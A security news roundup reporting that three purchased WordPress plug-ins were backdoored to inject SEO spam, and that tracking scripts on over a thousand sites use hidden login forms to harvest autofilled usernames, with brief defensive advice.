In what is becoming an increasingly common type of software supply chain attack, three more WordPress plug-ins that recently changed ownership got backdoored by their new owners. What’s worse is that the malicious code went undetected for months.
The rogue plug-ins are called Duplicate Page and Post, No Follow All External Links and WP No External Links and they all have been removed from the official WordPress plug-in repository over the past couple of weeks. At the time of their removal, they were installed on tens of thousands of WordPress websites.
According to an analysis by researchers from website security firm Wordfence all of the plug-ins were purchased over the past six months by the same actor with the explicit goal of backdooring them. The malicious code that was added by the new owner pulls spam content from a third-party server and displays it to visitors and search engine crawlers.
This practice is known as Search Engine Optimization (SEO) spam and its goal is to artificially inflate the search ranking of certain pages by injecting links to them into other websites without authorization.
The backdoor code in two of the plug-ins contact the same content server and information obtained by the Wordfence researchers suggests that all three plug-ins were bought by a U.K. company called Orb Online from the U.K. that describes itself as a “digital marketing agency, specializing in SEO, eCommerce and Magento web development.”
Last week, Wordfence discovered a different WordPress plug-in that had been backdoored after being sold by its original author. In that case, the rogue code opened unauthorized administrative access to websites that had the plug-in installed. And it wasn’t the first time when this kind of compromise hit WordPress users.
With hackers increasingly abusing the trust between users and their software providers, it becomes hard for companies to detect compromises. Preventing such attacks requires strong software control policies, reviewing and approving software updates and maintaining a software bill of materials for applications developed in-house.
Advertisers Use Hidden Login Forms to Discover Users’ Identities
Some advertising and Web analytics firms exploit a known privacy weakness in the password managers built into browsers to discover the usernames of anonymous visitors.
Researchers from Princeton’s Center for Information Technology Policy found tracking scripts on 1,110 websites from the Alexa top 1 million list that inject hidden login forms into pages in order to trick browsers into exposing usernames.
This is a known privacy leak that results from password managers built into browsers automatically filling in usernames and passwords saved by users for known websites. Hackers have been using hidden forms to extract such data with cross-site scripting attacks in the past.
For advertisers, associating a visitor who’s not logged in with an email address that’s typically used as a username, can be valuable and can be used for tracking.
“Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier,” the Princeton researchers said in a blog post. “A user’s email address will almost never change—clearing cookies, using private browsing mode, or switching devices won’t prevent tracking. The hash of an email address can be used to connect the pieces of an online profile scattered across different browsers, devices, and mobile apps. It can also serve as a link between browsing history profiles before and after cookie clears.”
Until browser vendors decide to address this issue in some way, it’s probably best for users to avoid using the built-in password managers, and disable the autofill option in third-party solutions. To protect their users, website owners can put their login forms on a separate subdomain, which will prevent autofill on non-login pages.